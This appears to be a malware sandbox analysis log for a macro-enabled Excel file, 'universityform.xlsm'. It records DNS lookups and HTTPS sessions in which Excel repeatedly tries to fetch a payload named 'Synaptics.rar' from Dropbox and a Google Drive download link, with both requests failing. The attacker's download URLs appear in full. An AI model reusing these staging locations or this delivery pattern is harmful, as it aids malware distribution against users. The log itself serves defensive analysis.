Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 30, 2024 11:11:03.595149040 CET | 192.168.2.4 | 1.1.1.1 | 0x8c77 | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:11:04.612171888 CET | 192.168.2.4 | 1.1.1.1 | 0x77a0 | Standard query (0) | www.dropbox.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:12:14.091897011 CET | 192.168.2.4 | 1.1.1.1 | 0x90ad | Standard query (0) | www.dropbox.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 30, 2024 11:11:03.505086899 CET | 1.1.1.1 | 192.168.2.4 | 0x1692 | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:11:03.505086899 CET | 1.1.1.1 | 192.168.2.4 | 0x1692 | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:11:03.601686954 CET | 1.1.1.1 | 192.168.2.4 | 0x8c77 | No error (0) | docs.google.com | - | 172.217.18.14 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:11:04.619338989 CET | 1.1.1.1 | 192.168.2.4 | 0x77a0 | No error (0) | www.dropbox.com | www-env.dropbox-dns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 30, 2024 11:11:04.619338989 CET | 1.1.1.1 | 192.168.2.4 | 0x77a0 | No error (0) | www-env.dropbox-dns.com | - | 162.125.66.18 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:11:58.393311977 CET | 1.1.1.1 | 192.168.2.4 | 0x20c3 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 30, 2024 11:11:58.393311977 CET | 1.1.1.1 | 192.168.2.4 | 0x20c3 | No error (0) | s-part-0017.t-0009.t-msedge.net | - | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:12:14.098603010 CET | 1.1.1.1 | 192.168.2.4 | 0x90ad | No error (0) | www.dropbox.com | www-env.dropbox-dns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 30, 2024 11:12:14.098603010 CET | 1.1.1.1 | 192.168.2.4 | 0x90ad | No error (0) | www-env.dropbox-dns.com | - | 162.125.66.18 | A (IP address) | IN (0x0001) | false
                              • docs.google.com
                              • www.dropbox.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 172.217.18.14 | 443 | 7460 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:11:04 UTC | 192 | OUT | GET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                              Host: docs.google.com
2024-12-30 10:11:04 UTC | 1223 | IN | HTTP/1.1 404 Not Found
                              Content-Type: text/html; charset=utf-8
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Mon, 30 Dec 2024 10:11:04 GMT
                              Strict-Transport-Security: max-age=31536000
                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                              Content-Security-Policy: script-src 'nonce-q0GAPQFIaaKGQ1rqp0jCGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                              Cross-Origin-Opener-Policy: same-origin
                              Server: ESF
                              X-XSS-Protection: 0
                              X-Content-Type-Options: nosniff
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Accept-Ranges: none
                              Vary: Accept-Encoding
                              Connection: close
                              Transfer-Encoding: chunked
2024-12-30 10:11:04 UTC | 167 | IN | Data Raw: 36 37 34 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69
                              Data Ascii: 674<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</ti
2024-12-30 10:11:04 UTC | 1390 | IN | Data Raw: 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 56 4d 42 4c 4b 2d 63 5f 44 43 53 33 72 48 4f 74 79 49 61 77 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 3b 7d 2a
                              Data Ascii: tle><style nonce="YVMBLK-c_DCS3rHOtyIawg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}*
2024-12-30 10:11:04 UTC | 102 | IN | Data Raw: 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
Data Ascii: ror.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>
2024-12-30 10:11:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 162.125.66.18 | 443 | 7460 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:11:05 UTC | 178 | OUT | GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                              Host: www.dropbox.com
2024-12-30 10:11:05 UTC | 825 | IN | HTTP/1.1 409 Conflict
                              Content-Security-Policy: script-src 'none'
                              Content-Security-Policy: sandbox
                              Pragma: no-cache
                              Referrer-Policy: strict-origin-when-cross-origin
                              Set-Cookie: gvc=MTIzNzA1OTE2MTI5MzI0NTQwOTYzMTIyNjkxODcxODU0NDEzNjI4; Path=/; Expires=Sat, 29 Dec 2029 10:11:05 GMT; HttpOnly; Secure; SameSite=None
                              X-Content-Type-Options: nosniff
                              X-Permitted-Cross-Domain-Policies: none
                              X-Robots-Tag: noindex, nofollow, noimageindex
                              X-Xss-Protection: 1; mode=block
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 1121
                              Date: Mon, 30 Dec 2024 10:11:05 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Server: envoy
                              Cache-Control: no-cache, no-store
                              Vary: Accept-Encoding
                              X-Dropbox-Response-Origin: far_remote
                              X-Dropbox-Request-Id: 743d44fff4104ac0835ac008522b8af8
                              Connection: close
2024-12-30 10:11:05 UTC | 1121 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 39 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                              Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 409</title><link href="https://cfl.dropboxstatic.com/static/metaserve


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49742 | 162.125.66.18 | 443 | 7460 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:11:06 UTC | 178 | OUT | GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                              Host: www.dropbox.com
2024-12-30 10:11:06 UTC | 825 | IN | HTTP/1.1 409 Conflict
                              Content-Security-Policy: script-src 'none'
                              Content-Security-Policy: sandbox
                              Pragma: no-cache
                              Referrer-Policy: strict-origin-when-cross-origin
                              Set-Cookie: gvc=MjE0ODY5OTQwNTE2MDE5NzI1MDgwOTMwMTIwNTY0MzA1MzgxMzM=; Path=/; Expires=Sat, 29 Dec 2029 10:11:06 GMT; HttpOnly; Secure; SameSite=None
                              X-Content-Type-Options: nosniff
                              X-Permitted-Cross-Domain-Policies: none
                              X-Robots-Tag: noindex, nofollow, noimageindex
                              X-Xss-Protection: 1; mode=block
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 1121
                              Date: Mon, 30 Dec 2024 10:11:06 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Server: envoy
                              Cache-Control: no-cache, no-store
                              Vary: Accept-Encoding
                              X-Dropbox-Response-Origin: far_remote
                              X-Dropbox-Request-Id: 5ec371f1e5264032bba55239a6d112ae
                              Connection: close
2024-12-30 10:11:06 UTC | 1121 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 39 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                              Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 409</title><link href="https://cfl.dropboxstatic.com/static/metaserve


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49853 | 172.217.18.14 | 443 | 7392 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:12:13 UTC | 192 | OUT | GET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                              Host: docs.google.com
2024-12-30 10:12:14 UTC | 1223 | IN | HTTP/1.1 404 Not Found
                              Content-Type: text/html; charset=utf-8
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Mon, 30 Dec 2024 10:12:13 GMT
                              Strict-Transport-Security: max-age=31536000
                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                              Content-Security-Policy: script-src 'nonce-nlYMqffGjvrncYmiM7UWdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                              Cross-Origin-Opener-Policy: same-origin
                              Server: ESF
                              X-XSS-Protection: 0
                              X-Content-Type-Options: nosniff
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Accept-Ranges: none
                              Vary: Accept-Encoding
                              Connection: close
                              Transfer-Encoding: chunked
2024-12-30 10:12:14 UTC | 167 | IN | Data Raw: 36 37 34 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69
                              Data Ascii: 674<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</ti
                               2024-12-30 10:12:14 UTC | 1390 | IN | Data Ascii: tle><style nonce="7HQzx_3Cs42E6Mxfo-tzAA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}*
                               2024-12-30 10:12:14 UTC | 102 | IN | Data Ascii: ror.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                               2024-12-30 10:12:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                               Data Ascii: 0


                               Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                               4          | 192.168.2.4 | 49862       | 162.125.66.18  | 443              | 7392 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                               Timestamp | Bytes transferred | Direction | Data
                               2024-12-30 10:12:14 UTC | 178 | OUT | GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                              Host: www.dropbox.com
                               2024-12-30 10:12:15 UTC | 825 | IN | HTTP/1.1 409 Conflict
                              Content-Security-Policy: script-src 'none'
                              Content-Security-Policy: sandbox
                              Pragma: no-cache
                              Referrer-Policy: strict-origin-when-cross-origin
                              Set-Cookie: gvc=MjYyMTU0NTA0NDY1MDIwMjQ0MzgzOTU5MDE4MTU1Njg3MDQ2MTc5; Path=/; Expires=Sat, 29 Dec 2029 10:12:14 GMT; HttpOnly; Secure; SameSite=None
                              X-Content-Type-Options: nosniff
                              X-Permitted-Cross-Domain-Policies: none
                              X-Robots-Tag: noindex, nofollow, noimageindex
                              X-Xss-Protection: 1; mode=block
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 1121
                              Date: Mon, 30 Dec 2024 10:12:14 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Server: envoy
                              Cache-Control: no-cache, no-store
                              Vary: Accept-Encoding
                              X-Dropbox-Response-Origin: far_remote
                              X-Dropbox-Request-Id: 0367924c13044610ba7b53524e392f98
                              Connection: close
                               2024-12-30 10:12:15 UTC | 1121 | IN | Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 409</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                               Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                               5          | 192.168.2.4 | 49869       | 162.125.66.18  | 443              | 7392 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                               Timestamp | Bytes transferred | Direction | Data
                               2024-12-30 10:12:15 UTC | 178 | OUT | GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                              Host: www.dropbox.com
                               2024-12-30 10:12:16 UTC | 825 | IN | HTTP/1.1 409 Conflict
                              Content-Security-Policy: script-src 'none'
                              Content-Security-Policy: sandbox
                              Pragma: no-cache
                              Referrer-Policy: strict-origin-when-cross-origin
                              Set-Cookie: gvc=Mjk0MDA5OTc4MzM1Nzk5MTg1NzMwNzEzNzY2OTc4MTIxMTgxODg1; Path=/; Expires=Sat, 29 Dec 2029 10:12:16 GMT; HttpOnly; Secure; SameSite=None
                              X-Content-Type-Options: nosniff
                              X-Permitted-Cross-Domain-Policies: none
                              X-Robots-Tag: noindex, nofollow, noimageindex
                              X-Xss-Protection: 1; mode=block
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 1121
                              Date: Mon, 30 Dec 2024 10:12:16 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Server: envoy
                              Cache-Control: no-cache, no-store
                              Vary: Accept-Encoding
                              X-Dropbox-Response-Origin: far_remote
                              X-Dropbox-Request-Id: c83e7507775d42e4a41136f3ea3dfec6
                              Connection: close
                               2024-12-30 10:12:16 UTC | 1121 | IN | Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 409</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                              Target ID:0
                              Start time:05:10:58
                              Start date:30/12/2024
                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Imagebase:0xe10000
                              File size:53'161'064 bytes
                              MD5 hash:4A871771235598812032C822E6F68F19
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:5
                              Start time:05:12:01
                              Start date:30/12/2024
                              Path:C:\Windows\splwow64.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\splwow64.exe 12288
                              Imagebase:0x7ff730fa0000
                              File size:163'840 bytes
                              MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:7
                              Start time:05:12:10
                              Start date:30/12/2024
                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\universityform.xlsm"
                              Imagebase:0xe10000
                              File size:53'161'064 bytes
                              MD5 hash:4A871771235598812032C822E6F68F19
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              No disassembly